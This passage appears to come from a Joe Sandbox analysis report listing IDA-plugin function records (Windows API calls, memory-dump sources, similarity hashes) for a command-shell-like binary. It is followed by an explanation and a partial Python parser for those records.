  • Part of subcall function 00EE6513: memset.MSVCRT ref: 00EE6593
  • Part of subcall function 00EEDC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00EE8E86,00EE8E5A,00000000), ref: 00EEDC98
  • Part of subcall function 00EEDC60: RtlFreeHeap.NTDLL ref: 00EEDC9F
• memset.MSVCRT ref: 00EFA097
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heapmemset$FreeProcess
• String ID: *.*
• API String ID: 1291122668-438819550
• Opcode ID: 64cdc712eefb401f99166e378c9f916a35da1fdc37804efc1508dd465337e440
• Instruction ID: 0323f3bb41fe046acac77a20f3d9b901618854cbbd5c2035bbb3595564b9f5c4
• Opcode Fuzzy Hash: 64cdc712eefb401f99166e378c9f916a35da1fdc37804efc1508dd465337e440
• Instruction Fuzzy Hash: B9B10EB1E0020C9BDF24DFA4C881ABEBBB5EF58704F199069EA09BB251D731DD40CB91
APIs
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00F05997
  • Part of subcall function 00EEAB7F: iswspace.MSVCRT ref: 00EEAB8D
  • Part of subcall function 00EEAB7F: wcschr.MSVCRT ref: 00EEAB9E
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Enumiswspacewcschr
• String ID: %s=%s$\Shell\Open\Command
• API String ID: 3493821229-3301834661
• Opcode ID: e95cfa6545705d6e6b48856e4ed7b2c1da5e5af80b1d0a973e1ac50cc6adc6d0
• Instruction ID: 44936b2c77931f7b0916b83dc21b6107a9dcf8271290aba9bdada7871910d20e
• Opcode Fuzzy Hash: e95cfa6545705d6e6b48856e4ed7b2c1da5e5af80b1d0a973e1ac50cc6adc6d0
• Instruction Fuzzy Hash: C9811D71F0061D9BDB249B24CC85BFB7379EFD4B10F2481A9E40AA71C1EAB09E41AF50
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID:
• String ID: GeToken: (%x) '%s'$Ungetting: '%s'
• API String ID: 0-1704545398
• Opcode ID: 038f263e68467e8d363eb390d042db7512914a4505e4890691563e42ae89fbab
• Instruction ID: e6328a7f15390d5b1acc25b323287b0f7c77d8e0263ca2ca18c51a5b50ed2e95
• Opcode Fuzzy Hash: 038f263e68467e8d363eb390d042db7512914a4505e4890691563e42ae89fbab
• Instruction Fuzzy Hash: 53518C31A0018D46C734BF26DC067BA7AA2EB50348F356039D416B72A1EBB29C43DB91
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: iswdigit$wcstol
• String ID: aApP
• API String ID: 644763121-2547155087
• Opcode ID: b78cd36367c1c95ead79a4b6ef7bfccd7c46efe42de23987ebda0e76fc380c4e
• Instruction ID: 031309f5da5025ca375af64ae8e164f895795af3b58fcda6d6f1fc1e8f97ceba
• Opcode Fuzzy Hash: b78cd36367c1c95ead79a4b6ef7bfccd7c46efe42de23987ebda0e76fc380c4e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F4125B5A0011687CF24DF29C88527FB3E5BF55321718043AEA06DB2C0EA34FD42F2A1
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00F057F8
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00F05886
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: EnumErrorLast
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1967352920-4275322459
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 18bc7ad712ad1310ce96d6a0aca8a5b2ba20627750a408b58ea921cc1fb98eb5
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fc47d6df9f735f6fa9af181f4bd4647d871758ea2ac422354a65c6215b1a03b6
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18bc7ad712ad1310ce96d6a0aca8a5b2ba20627750a408b58ea921cc1fb98eb5
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39412D71E0061D97CF34AB658C956BB73E5EB94B20F1445ADE80AA7281DAF04E41BE90
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0A79F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00F0A83C
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 00F0A8B5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                      • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3b53dcc7f63e7ba92021e7e90fee519ef53e71d9587f063f0555f630975cdd76
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9c300e9a3afef46c24ce9362db540f78ae318b3b4f99ca7a3b683712aa59070a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b53dcc7f63e7ba92021e7e90fee519ef53e71d9587f063f0555f630975cdd76
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B141B471E00219ABDF24DBA4DC95AFEB7F8EF08314F0440ADE605A7281E7749E85DB51
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: iswdigit.MSVCRT ref: 00EF320A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF321B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF322E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF3252
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF3269
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EF2FA6
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                      • String ID: <>+-*/%()|^&=,$-$-
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2770779731-3754639422
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 24bc45dda21969207974b0764cf00d17860cb1cddb5d56bb1570b20f9792acb7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 773c78ced76fd219ad08113e712425b4ab5921b1f33eccf1eb4600b6c481e819
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24bc45dda21969207974b0764cf00d17860cb1cddb5d56bb1570b20f9792acb7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40414572A0020DABCF11EE54D8419EF73B6AF55324F509129FF15BB240EB71AF458B90
                                                                                                                                                                                                                                                                                                                                                      APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00F03835
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F03847
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ErrorLastOpenSemaphore
• String ID: _p0$wil
• API String ID: 1909229842-1814513734
• Opcode ID: 678226f9305e42af59a5660ba6d3b21e2adb531d6f6ebc9c6f87be1919c3425a
• Instruction ID: 39f9527670c192889ae1fcc40d2fd7a3998c6e19efb926ba1f09509bd59cf68c
• Opcode Fuzzy Hash: 678226f9305e42af59a5660ba6d3b21e2adb531d6f6ebc9c6f87be1919c3425a
• Instruction Fuzzy Hash: 2F41D8B2E012298BCB25DF29C8596A977F9EF94310F1482D9E805D72D4DB708F45EB90
APIs
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00F0239F
• CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00F023CD
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CreateCurrentMutexProcess
• String ID: Local\SM0:%d:%d:%hs$wil
• API String ID: 3937467467-2303653343
• Opcode ID: 4d1a02577531f82fdf88d080dfe803270ee1da6f74e8a2fd9a50f8103bbba2c0
• Instruction ID: 02b2ae2564eafd270d4788b3ee05e54ebbe60a5eb1691fb47e823eb46d4cc63e
• Opcode Fuzzy Hash: 4d1a02577531f82fdf88d080dfe803270ee1da6f74e8a2fd9a50f8103bbba2c0
• Instruction Fuzzy Hash: E041E776A0022C9BCB21DF55DC8DEEAB7B5EF94710F1001C5E809A72C2DB709E45AFA0
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00F0CD40,0000001C,00F06901), ref: 00F056A8
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00F05778
  • Part of subcall function 00F064DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F0650F
  • Part of subcall function 00F064DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00), ref: 00F06545
  • Part of subcall function 00F064DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F06553
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$Close$CreateOpenValueiswspace
• String ID: Software\Classes$p~]u
• API String ID: 1047774138-3057340834
• Opcode ID: 8d04692880a4ac3bcb48f8a4216e0c3815fc1e2f0ba15ad66f55b1369b7a0017
• Instruction ID: 8e4493a4786bca3bfa42040338cfd3214a70d9941e714aa3e95748cbce3baef6
• Opcode Fuzzy Hash: 8d04692880a4ac3bcb48f8a4216e0c3815fc1e2f0ba15ad66f55b1369b7a0017
• Instruction Fuzzy Hash: 36314371E1471CCBDF18EBB998556AEB6F1AB48B10F24402EE102B72D1EEB55C01BF64
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00F0CCE0,0000001C,00F06931), ref: 00F05E32
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00F05EFB
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$CloseOpeniswspace
• String ID: Software\Classes$p~]u
• API String ID: 2439148603-3057340834
• Opcode ID: 65f5eb0bea00a56ab19a2e23e109aba4566172256398898d0d32523066908dbc
• Instruction ID: 1ab3d713f92db42258c796952799f4f98da8de1754d4a21c341abbef228ffb51
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65f5eb0bea00a56ab19a2e23e109aba4566172256398898d0d32523066908dbc
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4318631E146588BDB18EFB5C8556AEB6B1AB48B10F24402EE006B72D1EAB55D00BF54
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0B25E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 00F0B2D2
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 00F0B30B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                      • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ca5233ab27ec67437971933bfea7998ae1a547f7fe1d5d2320be777ec211ec74
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f8915dd5c63b97829645d6774a70f0da5ec7360555423502b35ab9a1b9e30f0b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca5233ab27ec67437971933bfea7998ae1a547f7fe1d5d2320be777ec211ec74
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9318271B0021DABDB15DBA9DC85BAEB7E8AF58350F040069A505E3281DB74DE44AB50
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: /-Y$COPYCMD
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1886669725-617350906
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 667291096cadfc9c62fbcbf3edee0dee9c1b0efe0952ae240848ab2db077486c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ffa6c5320acc5a19c0549c8e9b07bc24dd17128ba4d2557845fb120342bd3b25
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 667291096cadfc9c62fbcbf3edee0dee9c1b0efe0952ae240848ab2db077486c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45216BF1B002199BDB289B199C457FBB6F5EFC4358F512059EA49F72C4EA70CD41E260
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9E8E: iswspace.MSVCRT ref: 00EE9E9E
                                                                                                                                                                                                                                                                                                                                                      • iswspace.MSVCRT ref: 00EE9E28
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00EE9E79
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswspace$_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: off
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3989682491-733764931
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 87f06de6e465de2bc3e286f79281686ea79b34929e17952cf8055e1189ad9c9b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec8b8d26c0eb8965a9f4fe43ccd4c9fe9ba2ea859d96e5eebf623cf6eae9193f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87f06de6e465de2bc3e286f79281686ea79b34929e17952cf8055e1189ad9c9b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB112B717043DDA6DB34A26B6C1AB7A62D58B80B59B28202DFF07F60E3EA45CD41D1A1
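The records above are emitted per carved function by the Joe Sandbox IDA plugin: the API references with their call sites, the memory dump the function was lifted from, and the Similarity hashes (Opcode ID, Instruction Fuzzy Hash) that let one function be matched against other samples. Working with them at scale means parsing the text rather than reading it. The following is an added example, not Joe Sandbox's own code or tooling. It assumes only the layout visible on this page (each record starts at an "APIs" line and carries "Key: value" bullets under the APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity headings), treats the "Download File" text glued to each Associated dump name as a page link label to be stripped, and splits the "$"-joined String ID field into the individual strings. The sample input is constructed from two of the records on this page; the second is deliberately left truncated, as the last record on the page is, so that the completeness check has something to reject.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data.

Added example, not Joe Sandbox's own code. It assumes the layout visible in
the report: every carved function starts at an "APIs" line and carries
"Key: value" bullets under the APIs / Strings / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity headings.
"""
import re
from collections import defaultdict

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "memset.MSVCRT ref: 00F0B25E", optionally with an argument list after the
# module and a "Part of subcall function XXXX:" prefix for indirect calls.
API_REF = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<api>[^ (]+?)\.(?P<module>\w+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

# Constructed sample: two records taken from the report text, the second one
# truncated as on the page, preceded by the tail of a record cut off above.
SAMPLE = """\
• Instruction Fuzzy Hash: E4318631E146588BDB18EFB5C8556AEB6B1AB48B10F24402EE006B72D1EAB55D00BF54
APIs
• memset.MSVCRT ref: 00F0B25E
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• _wcslwr.MSVCRT ref: 00F0B2D2
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 00F0B30B
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Similarity
• API ID: memset$_wcslwr
• String ID: [%s]
• Opcode ID: ca5233ab27ec67437971933bfea7998ae1a547f7fe1d5d2320be777ec211ec74
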